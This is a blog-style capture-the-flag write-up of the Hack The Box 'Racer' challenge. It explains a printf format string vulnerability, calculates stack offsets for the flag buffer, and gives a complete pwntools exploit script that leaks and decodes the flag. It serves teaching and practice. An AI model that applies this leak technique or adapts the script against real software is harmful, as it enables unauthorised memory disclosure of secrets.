Hack The Box / Racer -Format String Vulnerability

Sai charan vadhyar



The write explains how to exploit “format string vulnerability” and obtain the flag


Do a check the security controls on the binary



Load the binary in Ghidra to check the contents of the binary


·         By looking at the contents of the binary, we could see in the car_menu function, Once the user wins the race, He is asked to input a data to provide for press which gets printed to the output using printf(__format).

·         This is a format string vulnerability that leaks the addresses on the stack

But, do we really have some useful input on the stack?


·         Look at the fopen function that opens the flag.txt in read mode and stores the data in __stream, the fgets functions places that data in the buffer local_3c variable identified in Ghidra which is 44 bytes.

·         So, the flag is placed on the stack as the buffer is written with the contents of flag.txt

·         The buffer is 44 bytes size

·         Now, we need to find a way to win the race



·         Could see that the user is allowed to enter the input after he wins

·         From the code disassembled from GHIDRA, we could see that flag.txt is present on local machine.

·         So, I have created a dummy file with flag.txt with just 4 bytes of “AAAA” .

·         The position of AAAA displaced on the stack defines the starting point of the buffer and the ending point of buffer is 44/4 + starting offset



·         The starting position of the buffer is the 12th position on the stack and hence the last offset of the stack is 12+44/4 = 12+11 = 23

·         So, we need to leak the address from offset 12 to 23 with string “%12$p ------%23$p”

·         Below I have presented a pwn tools script to do the same.


·         #!/usr/bin/env python3

·         from pwn import *

·         import pwn

·         import time, os, traceback, sys, os

·         import binascii, array

·         from textwrap import wrap

·         def start(argv=[], *a, **kw):

·             if pwn.args.GDB: # use the gdb script, sudo apt install gdbserver

·                 return pwn.gdb.debug([binPath]+argv, gdbscript=gdbscript, aslr=False, *a, **kw)

·             elif pwn.args.REMOTE: # ['server', 'port']

·                 return pwn.remote(sys.argv[1], sys.argv[2], *a, **kw)

·             else: # run locally, no GDB

·                 return pwn.process([binPath]+argv,aslr=True, *a, **kw)

·         # Set up the target binary and the remote server

·         binary = ELF('racecar')

·         binPath ="./racecar"

·         #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

·         io = process(binary.path)

·         # build in GDB support

·         gdbscript = '''

·         init-pwndbg

·         continue

·         '''.format(**locals())

·         p=start()

·         payload = ""

·         offset =12

·         end =  23

·         for i in range (12,23):

·             payload+= "%"+str(i)+"$p "

·         p.recvuntil(b'Name: ')

·         p.sendline(b'sai')

·         p.recvuntil(b'Nickname: ')

·         p.sendline(b'sai')

·         p.recvuntil(b'> ')

·         p.sendline(b'2')

·         p.recvuntil(b'> ')

·         p.sendline(b'1')

·         p.recvuntil(b'> ')

·         p.sendline(b'2')

·         p.recvuntil(b'> ')

·         p.sendline(payload)

·         p.recv()

·         response = p.recv()

·         flag = (response.decode("utf-8").split('m\n'))[1]

·         flag = flag.split()

·         recvd_flag=""

·         for values in flag:

·             recvd_flag+=pwn.p32(int(values,16)).decode("utf-8")


·         print("recieved flag is:",recvd_flag)



·         The payload is sent and the response is converted from str to integer and the flag is obtained



·         On execution we could see flag is obtained and the machine is pwned

·         We have used pwntools tubes p32 to convert the data back from little endian to original format.




Post a Comment

* Please Don't Spam Here. All the Comments are Reviewed by Admin.
Post a Comment (0)
Our website uses cookies to enhance your experience. Learn More
Accept !